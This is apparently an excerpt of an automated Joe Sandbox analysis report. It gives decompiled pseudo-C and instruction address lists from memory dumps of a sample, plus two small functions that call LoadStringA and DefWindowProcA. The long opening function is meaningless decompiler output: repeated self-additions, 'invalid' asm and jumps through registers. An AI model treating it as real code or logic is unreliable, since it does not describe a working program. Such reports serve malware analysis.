				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				_t617 = _t616 + _v58720196;
				_t448 = _t447 + 1;
				 *((intOrPtr*)(_t448 + _t637 + 0x41)) =  *((intOrPtr*)(_t448 + _t637 + 0x41)) + _t617;
				 *((intOrPtr*)(_t648 + 0x2c80040 + _t648 * 8)) =  *((intOrPtr*)(_t648 + 0x2c80040 + _t648 * 8)) + _t637;
				_t618 = _t617 + 1;
				_t449 = _t448 + _t618;
				 *_t618 =  *_t618 | _t449;
				if( *_t618 >= 0) {
					_v1929379780 = _v1929379780 + _t618;
					_t449 = _t449 + 1;
					 *_t449 =  *_t449 + _t449;
					_a1739849788 = _a1739849788 + _t618;
				}
				asm("a16 dec eax");
				 *((intOrPtr*)(_t449 + 0x4e)) =  *((intOrPtr*)(_t449 + 0x4e)) + _t449;
				 *((intOrPtr*)(_t449 + 0x4013)) =  *((intOrPtr*)(_t449 + 0x4013)) + _t594;
				_t451 =  *_t449() + _t450;
				_t695 = _t694 - 1;
				 *_t451 =  *_t451 + _t451;
				_push(_t695);
				 *_t451 =  *_t451 + _t451;
				asm("rol byte [esi+0x1], 0xe0");
				_t696 = _t695 - 1;
				_t663 = _t659 + 4;
				_t452 = _t451 + _t696;
				do {
					_t696 = _t696 - 1;
					_t664 = _t663 + 1;
					 *_t452 =  *_t452 + _t664;
					_t663 = _t664 |  *_t452;
				} while (_t663 >= 0);
				asm("adc eax, [eax]");
				_t595 = _t594 + _t594;
				asm("sbb [eax], al");
				asm("adc al, al");
				_t453 = _t452 + _t696;
				0x337061b4();
				_t649 = _t648 + 1;
				 *_t453 =  *_t453 + _t637;
				asm("rol byte [esi+0x1], 0x10");
				asm("rol byte [esi+0x1], 0x30");
				_t666 = _t663 + 0x00000001 |  *_t453;
				if(_t666 >= 0) {
					asm("sbb byte [ecx], 0x48");
					 *((intOrPtr*)(_t453 - 0x5a)) =  *((intOrPtr*)(_t453 - 0x5a)) + _t666;
					 *((intOrPtr*)(_t453 - 0x5a)) =  *((intOrPtr*)(_t453 - 0x5a)) + _t666;
					_t651 = _t649 + 2;
					 *_t453 =  *_t453 + _t666;
					while(1) {
						L7:
						_t667 = _t666 |  *_t453;
						if(_t667 < 0) {
							break;
						}
						_t455 = _t453 - 1 + _t637;
						 *((intOrPtr*)(_t455 + 1)) =  *((intOrPtr*)(_t455 + 1)) - 1;
						asm("ror byte [eax+ecx*2+0x488cd001], 1");
						 *_t455 =  *_t455 + _t667;
						_t668 = _t667 |  *_t455;
						if(_t668 >= 0) {
							L16:
							_t595[0xc] = _t595[0xc] ^ _t637;
						}
						asm("adc al, 0x40");
						 *_t455 =  *_t455 + _t455;
						asm("invalid");
						 *((intOrPtr*)(_t455 + 0x33)) =  *((intOrPtr*)(_t455 + 0x33)) + _t455;
						while(1) {
							_t453 = _t455 ^  *(_t651 + 1);
							asm("sbb [edi], dh");
							_t656 = _t651 + 1;
							 *_t453 =  *_t453 + _t656;
							asm("cmpsb");
							 *((intOrPtr*)(_t453 + 0x33)) =  *((intOrPtr*)(_t453 + 0x33)) + _t453;
							 *((intOrPtr*)(_t453 + 0x33)) =  *((intOrPtr*)(_t453 + 0x33)) + _t453;
							_t651 = _t656 + 3;
							 *_t453 =  *_t453 + _t668;
							_t666 = _t668 |  *_t453;
							if(_t666 >= 0) {
								goto L7;
							}
							asm("adc al, 0x40");
							 *_t453 =  *_t453 + _t453;
							 *_t453 =  *_t453 + 1;
							asm("lock or eax, [ecx+eax-0x70]");
							asm("adc [ecx+eax-0x20], al");
							if( *_t453 <= 0) {
								L15:
								 *((intOrPtr*)(_t453 + 0x30014325)) =  *((intOrPtr*)(_t453 + 0x30014325)) + _t637;
								goto L16;
							}
							_t455 = _t453 + _t666 |  *(_t618 + _t453 + _t666 - 0x10) |  *(_t618 + (_t453 + _t666 |  *(_t618 + _t453 + _t666 - 0x10)) + 0x30);
							_t668 = _t666 |  *_t455;
							if(_t668 >= 0) {
								continue;
							}
							asm("adc al, 0x40");
							 *_t455 =  *_t455 + _t455;
							 *_t455 =  *_t455 - 1;
							_t591 = 0xd9 +  &_v3;
							_t696 = _t696 - 1;
							_t668 = _t668 + 1;
							 *((intOrPtr*)(_t591 - 0x4ffeba27)) =  *((intOrPtr*)(_t591 - 0x4ffeba27)) + _t668;
							 *_t595 =  *_t595 ^ _t618;
							 *(_t595 - 8) =  *(_t595 - 8) ^ _t637;
							asm("adc al, 0x40");
							 *_t591 =  *_t591 + 0xd9;
							_t453 =  *_t591() & 0x2c400143;
							 *((intOrPtr*)(_t453 - 0x68)) =  *((intOrPtr*)(_t453 - 0x68)) + _t668;
							_t595 =  &(_t595[0]);
							 *((intOrPtr*)(_t453 - 0x6ffebcdb)) =  *((intOrPtr*)(_t453 - 0x6ffebcdb)) + _t637;
							goto L15;
						}
					}
					asm("adc al, 0x40");
					 *_t453 =  *_t453 + _t453;
					goto [far dword [eax];
				}
				asm("adc al, 0x40");
				 *_t453 =  *_t453 + _t453;
				goto ( *__eax);
			}

0x00485834
0x00485839
0x00485842
0x0048584f
0x00485855
0x00485862
0x00485868
0x0048586d
0x00485875
0x0048587b
0x00485882
0x00485888
0x0048588d
0x0048588e
0x00485894
0x00485896
0x00485898
0x0048589a
0x0048589c
0x0048589e
0x004858a0
0x004858a2
0x004858a4
0x004858a6
0x004858a8
0x004858aa
0x004858ac
0x004858ae
0x004858b0
0x004858b2
0x004858b4
0x004858b6
0x004858b8
0x004858ba
0x004858bc
0x004858be
0x004858c0
0x004858c2
0x004858c4
0x004858c6
0x004858c8
0x004858ca
0x004858cc
0x004858ce
0x004858d0
0x004858d2
0x004858d4
0x004858d6
0x004858d8
0x004858da
0x004858dc
0x004858de
0x004858e0
0x004858e2
0x004858e4
0x004858e6
0x004858e8
0x004858ea
0x004858ec
0x004858ee
0x004858f0
0x004858f2
0x004858f4
0x004858f6
0x004858f8
0x004858fa
0x004858fc
0x004858fe
0x00485900
0x00485902
0x00485904
0x00485906
0x00485908
0x0048590a
0x0048590c
0x0048590e
0x00485910
0x00485912
0x00485914
0x00485916
0x00485918
0x0048591a
0x0048591c
0x0048591e
0x00485920
0x00485922
0x00485924
0x00485926
0x00485928
0x0048592a
0x0048592c
0x0048592e
0x00485930
0x00485932
0x00485934
0x00485936
0x00485938
0x0048593a
0x0048593c
0x0048593e
0x00485940
0x00485942
0x00485944
0x00485946
0x00485948
0x0048594a
0x0048594c
0x0048594e
0x00485950
0x00485952
0x00485954
0x00485956
0x00485958
0x0048595a
0x0048595c
0x0048595e
0x00485960
0x00485962
0x00485964
0x00485966
0x00485968
0x0048596a
0x0048596c
0x0048596e
0x00485970
0x00485972
0x00485974
0x00485976
0x00485978
0x0048597a
0x0048597c
0x0048597e
0x00485980
0x00485982
0x00485984
0x00485986
0x00485988
0x0048598a
0x0048598c
0x0048598e
0x00485990
0x00485992
0x00485994
0x00485996
0x00485998
0x0048599a
0x0048599c
0x0048599e
0x004859a0
0x004859a2
0x004859a4
0x004859a6
0x004859a8
0x004859aa
0x004859ac
0x004859ae
0x004859b0
0x004859b2
0x004859b4
0x004859b6
0x004859b8
0x004859ba
0x004859bc
0x004859be
0x004859c0
0x004859c2
0x004859c4
0x004859c6
0x004859c8
0x004859ca
0x004859cc
0x004859ce
0x004859d0
0x004859d2
0x004859d4
0x004859d6
0x004859d8
0x004859da
0x004859dc
0x004859de
0x004859e0
0x004859e2
0x004859e4
0x004859e6
0x004859e8
0x004859ea
0x004859ec
0x004859ee
0x004859f0
0x004859f2
0x004859f4
0x004859f6
0x004859f8
0x004859fa
0x004859fc
0x004859fe
0x00485a00
0x00485a02
0x00485a04
0x00485a06
0x00485a08
0x00485a0a
0x00485a0c
0x00485a0e
0x00485a10
0x00485a12
0x00485a14
0x00485a16
0x00485a18
0x00485a1a
0x00485a1c
0x00485a1e
0x00485a20
0x00485a22
0x00485a24
0x00485a26
0x00485a28
0x00485a2a
0x00485a2c
0x00485a2e
0x00485a30
0x00485a32
0x00485a34
0x00485a36
0x00485a38
0x00485a3a
0x00485a3c
0x00485a3e
0x00485a40
0x00485a42
0x00485a44
0x00485a46
0x00485a48
0x00485a4a
0x00485a4c
0x00485a4e
0x00485a50
0x00485a52
0x00485a54
0x00485a56
0x00485a58
0x00485a5a
0x00485a5c
0x00485a5e
0x00485a60
0x00485a62
0x00485a64
0x00485a66
0x00485a68
0x00485a6a
0x00485a6c
0x00485a6e
0x00485a70
0x00485a72
0x00485a74
0x00485a76
0x00485a78
0x00485a7a
0x00485a7c
0x00485a7e
0x00485a80
0x00485a82
0x00485a84
0x00485a86
0x00485a88
0x00485a8a
0x00485a8c
0x00485a8e
0x00485a90
0x00485a92
0x00485a94
0x00485a96
0x00485a98
0x00485a9a
0x00485a9c
0x00485a9e
0x00485aa0
0x00485aa2
0x00485aa4
0x00485aa6
0x00485aa8
0x00485aaa
0x00485aac
0x00485aae
0x00485ab0
0x00485ab2
0x00485ab4
0x00485ab6
0x00485ab8
0x00485aba
0x00485abc
0x00485abe
0x00485ac0
0x00485ac2
0x00485ac4
0x00485ac6
0x00485ac8
0x00485aca
0x00485acc
0x00485ace
0x00485ad0
0x00485ad2
0x00485ad4
0x00485ad6
0x00485ad8
0x00485ada
0x00485adc
0x00485ade
0x00485ae0
0x00485ae2
0x00485ae4
0x00485ae6
0x00485ae8
0x00485aea
0x00485aec
0x00485aee
0x00485af0
0x00485af2
0x00485af4
0x00485af6
0x00485af8
0x00485afa
0x00485afc
0x00485afe
0x00485b00
0x00485b02
0x00485b04
0x00485b06
0x00485b08
0x00485b0a
0x00485b0c
0x00485b0e
0x00485b10
0x00485b12
0x00485b14
0x00485b16
0x00485b18
0x00485b1a
0x00485b1c
0x00485b1e
0x00485b20
0x00485b22
0x00485b24
0x00485b26
0x00485b28
0x00485b2a
0x00485b2c
0x00485b2e
0x00485b30
0x00485b32
0x00485b34
0x00485b36
0x00485b38
0x00485b3a
0x00485b3c
0x00485b3e
0x00485b40
0x00485b42
0x00485b44
0x00485b46
0x00485b48
0x00485b4a
0x00485b4c
0x00485b4e
0x00485b50
0x00485b52
0x00485b54
0x00485b56
0x00485b58
0x00485b5a
0x00485b5c
0x00485b5e
0x00485b60
0x00485b62
0x00485b64
0x00485b66
0x00485b68
0x00485b6a
0x00485b6c
0x00485b6e
0x00485b70
0x00485b72
0x00485b74
0x00485b76
0x00485b78
0x00485b7a
0x00485b7c
0x00485b7e
0x00485b80
0x00485b82
0x00485b84
0x00485b86
0x00485b88
0x00485b8a
0x00485b8c
0x00485b8e
0x00485b90
0x00485b92
0x00485b94
0x00485b96
0x00485b98
0x00485b9a
0x00485b9c
0x00485b9e
0x00485ba0
0x00485ba2
0x00485ba4
0x00485ba6
0x00485ba8
0x00485baa
0x00485bac
0x00485bae
0x00485bb0
0x00485bb2
0x00485bb4
0x00485bb6
0x00485bb8
0x00485bba
0x00485bbc
0x00485bbe
0x00485bc0
0x00485bc2
0x00485bc4
0x00485bc6
0x00485bc8
0x00485bca
0x00485bcc
0x00485bce
0x00485bd0
0x00485bd2
0x00485bd4
0x00485bd6
0x00485bd8
0x00485bda
0x00485bdc
0x00485bde
0x00485be0
0x00485be2
0x00485be4
0x00485be6
0x00485be8
0x00485bea
0x00485bec
0x00485bee
0x00485bf0
0x00485bf2
0x00485bf4
0x00485bf6
0x00485bf8
0x00485bfa
0x00485bfc
0x00485bfe
0x00485c00
0x00485c02
0x00485c04
0x00485c06
0x00485c08
0x00485c0a
0x00485c0c
0x00485c0e
0x00485c10
0x00485c12
0x00485c14
0x00485c16
0x00485c18
0x00485c1a
0x00485c1c
0x00485c1e
0x00485c20
0x00485c22
0x00485c24
0x00485c26
0x00485c28
0x00485c2a
0x00485c2c
0x00485c2e
0x00485c30
0x00485c32
0x00485c34
0x00485c36
0x00485c38
0x00485c3a
0x00485c3c
0x00485c3e
0x00485c40
0x00485c42
0x00485c44
0x00485c46
0x00485c48
0x00485c4a
0x00485c4c
0x00485c4e
0x00485c50
0x00485c52
0x00485c54
0x00485c56
0x00485c58
0x00485c5a
0x00485c5c
0x00485c5e
0x00485c60
0x00485c62
0x00485c64
0x00485c66
0x00485c68
0x00485c6a
0x00485c6c
0x00485c6e
0x00485c70
0x00485c72
0x00485c74
0x00485c76
0x00485c78
0x00485c7a
0x00485c7c
0x00485c7e
0x00485c80
0x00485c82
0x00485c84
0x00485c86
0x00485c88
0x00485c8a
0x00485c8c
0x00485c8e
0x00485c90
0x00485c92
0x00485c94
0x00485c96
0x00485c98
0x00485c9a
0x00485c9c
0x00485c9e
0x00485ca0
0x00485ca2
0x00485ca4
0x00485ca6
0x00485ca8
0x00485caa
0x00485cac
0x00485cae
0x00485cb0
0x00485cb2
0x00485cb4
0x00485cb6
0x00485cb8
0x00485cba
0x00485cbc
0x00485cbe
0x00485cc0
0x00485cc2
0x00485cc4
0x00485cc6
0x00485cc8
0x00485cca
0x00485ccc
0x00485cce
0x00485cd0
0x00485cd2
0x00485cd4
0x00485cd6
0x00485cd8
0x00485cda
0x00485cdc
0x00485cde
0x00485ce0
0x00485ce2
0x00485ce4
0x00485ce6
0x00485ce8
0x00485cea
0x00485cec
0x00485cee
0x00485cf0
0x00485cf2
0x00485cf4
0x00485cf6
0x00485cf8
0x00485cfa
0x00485cfc
0x00485cfe
0x00485d00
0x00485d02
0x00485d04
0x00485d06
0x00485d08
0x00485d0a
0x00485d0c
0x00485d0e
0x00485d10
0x00485d12
0x00485d14
0x00485d16
0x00485d18
0x00485d1a
0x00485d1c
0x00485d1e
0x00485d20
0x00485d22
0x00485d24
0x00485d26
0x00485d28
0x00485d2a
0x00485d2c
0x00485d2e
0x00485d30
0x00485d32
0x00485d34
0x00485d36
0x00485d38
0x00485d3a
0x00485d3c
0x00485d3e
0x00485d40
0x00485d42
0x00485d44
0x00485d46
0x00485d48
0x00485d4a
0x00485d4c
0x00485d4e
0x00485d50
0x00485d52
0x00485d54
0x00485d56
0x00485d58
0x00485d5a
0x00485d5c
0x00485d5e
0x00485d60
0x00485d62
0x00485d64
0x00485d66
0x00485d68
0x00485d6a
0x00485d6c
0x00485d6e
0x00485d70
0x00485d72
0x00485d74
0x00485d76
0x00485d78
0x00485d7a
0x00485d7c
0x00485d7e
0x00485d80
0x00485d82
0x00485d84
0x00485d86
0x00485d88
0x00485d8a
0x00485d8c
0x00485d8e
0x00485d90
0x00485d92
0x00485d94
0x00485d96
0x00485d98
0x00485d9a
0x00485d9c
0x00485d9e
0x00485da0
0x00485da2
0x00485da4
0x00485da6
0x00485da8
0x00485daa
0x00485dac
0x00485dae
0x00485db0
0x00485db2
0x00485db4
0x00485db6
0x00485db8
0x00485dba
0x00485dbc
0x00485dbe
0x00485dc0
0x00485dc2
0x00485dc4
0x00485dc6
0x00485dc8
0x00485dca
0x00485dcc
0x00485dce
0x00485dd0
0x00485dd2
0x00485dd4
0x00485dd6
0x00485dd8
0x00485dda
0x00485ddc
0x00485dde
0x00485de0
0x00485de2
0x00485de4
0x00485de6
0x00485de8
0x00485dea
0x00485dec
0x00485dee
0x00485df0
0x00485df2
0x00485df4
0x00485df6
0x00485df8
0x00485dfa
0x00485dfc
0x00485dfe
0x00485e00
0x00485e02
0x00485e04
0x00485e06
0x00485e08
0x00485e0a
0x00485e0c
0x00485e0e
0x00485e10
0x00485e12
0x00485e14
0x00485e16
0x00485e18
0x00485e1a
0x00485e1c
0x00485e1e
0x00485e20
0x00485e22
0x00485e24
0x00485e26
0x00485e28
0x00485e2a
0x00485e2c
0x00485e2e
0x00485e30
0x00485e32
0x00485e34
0x00485e36
0x00485e38
0x00485e3a
0x00485e3c
0x00485e3e
0x00485e40
0x00485e42
0x00485e44
0x00485e46
0x00485e48
0x00485e4a
0x00485e4c
0x00485e4e
0x00485e50
0x00485e52
0x00485e54
0x00485e56
0x00485e58
0x00485e5a
0x00485e5c
0x00485e5e
0x00485e60
0x00485e62
0x00485e64
0x00485e66
0x00485e68
0x00485e6a
0x00485e6c
0x00485e6e
0x00485e70
0x00485e72
0x00485e74
0x00485e76
0x00485e78
0x00485e7a
0x00485e7c
0x00485e7e
0x00485e80
0x00485e82
0x00485e84
0x00485e86
0x00485e88
0x00485e8a
0x00485e8c
0x00485e8e
0x00485e90
0x00485e92
0x00485e94
0x00485e96
0x00485e98
0x00485e9a
0x00485e9c
0x00485e9e
0x00485ea0
0x00485ea2
0x00485ea4
0x00485ea6
0x00485ea8
0x00485eaa
0x00485eac
0x00485eae
0x00485eb0
0x00485eb2
0x00485eb4
0x00485eb6
0x00485eb8
0x00485eba
0x00485ebc
0x00485ebe
0x00485ec0
0x00485ec2
0x00485ec4
0x00485ec6
0x00485ec8
0x00485eca
0x00485ecc
0x00485ece
0x00485ed0
0x00485ed2
0x00485ed4
0x00485ed6
0x00485ed8
0x00485eda
0x00485edc
0x00485ede
0x00485ee0
0x00485ee2
0x00485ee4
0x00485ee6
0x00485ee8
0x00485eea
0x00485eec
0x00485eee
0x00485ef0
0x00485ef2
0x00485ef4
0x00485ef6
0x00485ef8
0x00485efa
0x00485efc
0x00485efe
0x00485f00
0x00485f02
0x00485f04
0x00485f06
0x00485f08
0x00485f0a
0x00485f0c
0x00485f0e
0x00485f10
0x00485f12
0x00485f14
0x00485f16
0x00485f18
0x00485f1a
0x00485f1c
0x00485f1e
0x00485f20
0x00485f22
0x00485f24
0x00485f26
0x00485f28
0x00485f2a
0x00485f2c
0x00485f2e
0x00485f30
0x00485f32
0x00485f34
0x00485f36
0x00485f38
0x00485f3a
0x00485f3c
0x00485f3e
0x00485f40
0x00485f42
0x00485f44
0x00485f46
0x00485f48
0x00485f4a
0x00485f4c
0x00485f4e
0x00485f50
0x00485f52
0x00485f54
0x00485f56
0x00485f58
0x00485f5a
0x00485f5c
0x00485f5e
0x00485f60
0x00485f62
0x00485f64
0x00485f66
0x00485f68
0x00485f6a
0x00485f6c
0x00485f6e
0x00485f70
0x00485f72
0x00485f74
0x00485f76
0x00485f78
0x00485f7a
0x00485f7c
0x00485f7e
0x00485f80
0x00485f82
0x00485f84
0x00485f86
0x00485f88
0x00485f8a
0x00485f8c
0x00485f8e
0x00485f90
0x00485f92
0x00485f94
0x00485f96
0x00485f98
0x00485f9a
0x00485f9c
0x00485f9e
0x00485fa0
0x00485fa2
0x00485fa4
0x00485fa6
0x00485fa8
0x00485faa
0x00485fac
0x00485fae
0x00485fb0
0x00485fb2
0x00485fb4
0x00485fb6
0x00485fb8
0x00485fba
0x00485fbc
0x00485fbe
0x00485fc0
0x00485fc2
0x00485fc4
0x00485fc6
0x00485fc8
0x00485fca
0x00485fcc
0x00485fce
0x00485fd0
0x00485fd2
0x00485fd4
0x00485fd6
0x00485fd8
0x00485fda
0x00485fdc
0x00485fde
0x00485fe0
0x00485fe2
0x00485fe4
0x00485fe6
0x00485fe8
0x00485fea
0x00485fec
0x00485fee
0x00485ff0
0x00485ff2
0x00485ff4
0x00485ff6
0x00485ff8
0x00485ffa
0x00485ffc
0x00485ffe
0x00486000
0x00486002
0x00486004
0x00486006
0x00486008
0x0048600e
0x0048600f
0x00486013
0x0048601a
0x0048601b
0x0048601d
0x00486020
0x00486024
0x0048602a
0x0048602b
0x00486030
0x00486030
0x00486035
0x00486037
0x0048603b
0x00486043
0x00486045
0x00486047
0x00486049
0x0048604b
0x0048604d
0x00486051
0x00486052
0x00486053
0x00486055
0x00486055
0x00486056
0x00486057
0x00486059
0x00486059
0x0048605d
0x00486060
0x00486062
0x00486064
0x00486067
0x00486069
0x0048606e
0x0048606f
0x00486071
0x00486075
0x00486079
0x0048607b
0x0048608c
0x0048608f
0x00486093
0x00486096
0x00486097
0x00486099
0x00486099
0x00486099
0x0048609b
0x00000000
0x00000000
0x004860cb
0x004860cd
0x004860d0
0x004860d7
0x004860d9
0x004860db
0x00486155
0x0048615a
0x0048615a
0x004860dd
0x004860df
0x004860e1
0x004860e3
0x004860e5
0x004860e5
0x004860e8
0x004860ea
0x004860eb
0x004860ed
0x004860ef
0x004860f3
0x004860f6
0x004860f7
0x004860f9
0x004860fb
0x00000000
0x00000000
0x004860fd
0x004860ff
0x00486101
0x00486104
0x00486109
0x0048610d
0x00486153
0x00486153
0x00000000
0x00486153
0x00486115
0x00486119
0x0048611b
0x00000000
0x00000000
0x0048611d
0x0048611f
0x00486121
0x0048612c
0x0048612d
0x0048612e
0x0048612f
0x00486138
0x0048613a
0x0048613d
0x0048613f
0x00486145
0x0048614b
0x0048614e
0x0048614f
0x00000000
0x0048614f
0x004860e5
0x0048609d
0x0048609f
0x004860a1
0x004860a1
0x0048607d
0x0048607f
0x00486081

Memory Dump Source

Source File: 0000000C.00000002.14988367739.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.14988330024.00400000.00000002.sdmp
Associated: 0000000C.00000002.14989805703.00491000.00000040.sdmp
Associated: 0000000C.00000002.14989835401.0049A000.00000040.sdmp
Associated: 0000000C.00000002.14991020072.00513000.00000080.sdmp
Associated: 0000000C.00000002.14991088656.00514000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_358saxio.jbxd

Function 00406A30, Relevance: 1.5, APIs: 1, Instructions: 32

C-Code - Quality: 88%

			E00406A30(intOrPtr* __eax, void* __edx) {
				char _v4104;
				intOrPtr* _t5;
				int _t12;
				void* _t20;
				void* _t21;

				_t5 = __eax;
				_t21 = _t20 + 0xfffff004;
				_push(__eax);
				_t19 = __edx;
				if(__eax != 0) {
					_t24 =  *(__eax + 4) - 0x10000;
					if( *(__eax + 4) >= 0x10000) {
						_t5 = E00404F80(__edx,  *(__eax + 4));
					} else {
						_t12 = LoadStringA(E00405F54( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v4104, 0x1000); // executed
						_t5 = E00404E78(_t19, _t12, _t21, _t24);
					}
				}
				return _t5;
			}

0x00406a30
0x00406a32
0x00406a38
0x00406a39
0x00406a3f
0x00406a41
0x00406a48
0x00406a79
0x00406a4a
0x00406a62
0x00406a6d
0x00406a6d
0x00406a48
0x00406a86

APIs

LoadStringA.USER32(00000000,00010000,?,00001000), ref: 00406A62

Memory Dump Source

Source File: 0000000C.00000002.14988367739.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.14988330024.00400000.00000002.sdmp
Associated: 0000000C.00000002.14989805703.00491000.00000040.sdmp
Associated: 0000000C.00000002.14989835401.0049A000.00000040.sdmp
Associated: 0000000C.00000002.14991020072.00513000.00000080.sdmp
Associated: 0000000C.00000002.14991088656.00514000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_358saxio.jbxd

Function 0045C6B4, Relevance: 1.5, APIs: 1, Instructions: 24

C-Code - Quality: 100%

			E0045C6B4(intOrPtr _a4) {
				long _t27;

				_t27 = DefWindowProcA( *( *((intOrPtr*)(_a4 - 4)) + 0x30),  *( *(_a4 - 8)), ( *(_a4 - 8))[1], ( *(_a4 - 8))[2]); // executed
				( *(_a4 - 8))[3] = _t27;
				return _t27;
			}

0x0045c6de
0x0045c6e9
0x0045c6ed

APIs

DefWindowProcA.USER32(?,?,?,?), ref: 0045C6DE

Memory Dump Source

